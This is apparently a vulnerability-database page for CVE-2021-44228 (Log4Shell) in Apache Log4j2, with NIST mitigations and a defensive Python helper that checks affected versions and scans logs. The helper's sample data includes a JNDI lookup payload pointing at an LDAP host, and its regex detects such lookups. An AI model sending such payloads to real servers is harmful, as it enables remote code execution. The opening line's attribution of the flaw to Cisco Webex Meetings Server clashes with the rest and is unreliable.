CVE-2021-44228
Published: 10 December 2021
Summary
CVE-2021-44228 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Cisco Webex Meetings Server. Its CVSS base score is 10.0 (Critical).
Operationally, it is ranked in the top 0.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog; and a public proof of concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-2 (Flaw Remediation).
Deeper analysis
Apache Log4j2 versions 2.0-beta9 through 2.15.0, excluding the security releases 2.12.2, 2.12.3, and 2.3.1, are affected by a flaw in JNDI features used within configuration, log messages, and parameters. These features do not protect against attacker-controlled LDAP and other JNDI endpoints, enabling arbitrary code execution when message lookup substitution is enabled. The issue is specific to log4j-core and carries a CVSS 3.1 score of 10.0.
An attacker able to control log messages or log message parameters can trigger the vulnerability to load and execute arbitrary code from remote LDAP servers. No privileges or user interaction are required, and the attack can be performed over the network with impacts to confidentiality, integrity, and availability.
The provided references include multiple public proofs of concept for remote code execution and information disclosure against affected versions, along with vendor advisories. The underlying description states that the behavior was disabled by default starting in 2.15.0 and the functionality was fully removed in 2.16.0 and the listed security releases.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-34768
Vulnerability details
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
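As an added example that is not part of this CVE record, the following Python triage helper applies the affected-version range stated above to a log4j-core version string and flags log lines carrying the `${jndi:` lookup syntax the advisory describes. The sample log lines are constructed, and the pre-release ordering (alpha < beta < rc < final) is an assumption of the helper.

```python
import re

# Constructed sample log lines (not from the CVE record); the second carries a JNDI lookup string.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://192.0.2.10:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03] "GET /health HTTP/1.1" 200 "curl/7.79"',
]

# Log4j 2 lookup syntax is ${name:...}; this CVE concerns the jndi lookup, whatever
# JNDI scheme (ldap, ldaps, rmi, dns ...) follows it.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def find_jndi_lookups(lines):
    """Return [(line_no, line)] for every line that contains a JNDI lookup string."""
    return [(n, line) for n, line in enumerate(lines, 1) if JNDI_LOOKUP.search(line)]

# Security releases that the advisory excludes from the affected range.
SECURITY_RELEASES = {"2.12.2", "2.12.3", "2.3.1"}
PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}   # assumed pre-release ordering, all before final

def parse_version(version):
    """Turn '2.0-beta9' or '2.14.1' into a tuple that sorts like Log4j release order."""
    base, _, pre = version.partition("-")
    nums = [int(x) for x in base.split(".")]
    nums += [0] * (3 - len(nums))          # '2.0' -> 2.0.0
    if not pre:
        return (*nums, 3, 0)               # a final release outranks any pre-release
    match = re.fullmatch(r"([a-z]+)(\d*)", pre.lower())
    if not match:
        return (*nums, 0, 0)               # unknown suffix: treat as earliest pre-release
    return (*nums, PRE_ORDER.get(match.group(1), 0), int(match.group(2) or 0))

def is_affected(version):
    """True if a log4j-core version is in the CVE-2021-44228 range 2.0-beta9 .. 2.15.0,
    minus the three security releases. Later CVEs against 2.15.0/2.16.0 are out of scope."""
    if version in SECURITY_RELEASES:
        return False
    return parse_version("2.0-beta9") <= parse_version(version) <= parse_version("2.15.0")

if __name__ == "__main__":
    for ver in ("2.14.1", "2.15.0", "2.16.0", "2.12.2", "2.0-beta8", "1.2.17"):
        print(f"log4j-core {ver}: {'AFFECTED' if is_affected(ver) else 'not affected'}")
    for n, _ in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup string found")
```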
- CWE(s): CWE-20
- KEV Date Added: 10 December 2021
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly requires timely installation of vendor patches that remove the JNDI lookup functionality in Log4j 2.16.0+.
- CM-6 (Configuration Settings): mandates applying the secure configuration setting (log4j2.formatMsgNoLookups=true or equivalent) that disables message lookup substitution in affected versions.
- Enforces boundary rules that block unauthorized outbound LDAP/JNDI connections to the attacker-controlled endpoints used in this CVE.